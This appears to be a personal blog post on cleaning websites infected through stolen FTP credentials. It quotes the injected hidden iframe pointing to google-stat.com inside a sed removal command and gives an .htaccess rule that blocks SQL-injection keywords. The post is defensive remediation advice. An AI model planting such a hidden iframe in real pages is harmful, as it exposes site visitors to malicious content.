Seams like we are experiencing “new” age of hacking in a mass scale recently. The target is the server side apps. First when I found injection on websites I’m currently working on I thought it’s a WP hole, but supposedly all happened during the unencrypted ftp connections, I dare to say, I made from Windows system. What have I read is that there is a worm or horse or whatever animal who catches the user & password data, it either downloads each index (text file) from server or inject it’s code directly in server during or else after the ftp session.

Solution seams to be so far.
Do not use Windows :), no seriously, run the Antivir in windows safe mode, then change the ftp password, clean up the infected files and never use simple ftp again. Use SFTP only!

If you found “little iframe”, run the first command on the server (you have to have SSH access, if you don’t ask for it, and if they don’t give it to you I suggest change hosting, or ask them if they can do it for you (they have to give you sftp access anyway). Run the command bellow. It founds infected files.

find . | xargs grep "google-stat"

Then if it founds the injection then, clean it up.

find ./* -type f -exec sed -i 's/<iframe src="http:\/\/google-stat.com\/tomi\/?t=2" width=0 height=0 style="hidden" frameborder=0 marginheight=0 marginwidth=0 scrolling=no><\/iframe>//g' {} \;

here is another help(.httacess)
RewriteCond %{QUERY_STRING} ^.*(;|<|>|'|"|\)|%0A|%0D|%22|%27|%3C|%3E|%00).*(/\*|union|select|insert|cast|set|declare|drop|update|md5|benchmark).* [NC]
RewriteRule .* - [F]

if you are on Dreamhost and even if you are not look here

http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

references:

• http://www.webhostingtalk.com/showthread.php?p=5282606
• http://tips.webdesign10.com/recursively-find-and-replace-linux
• http://www.linuxquestions.org/questions/slackware-14/sed-command-to-replace-slash-with-backslash-136312/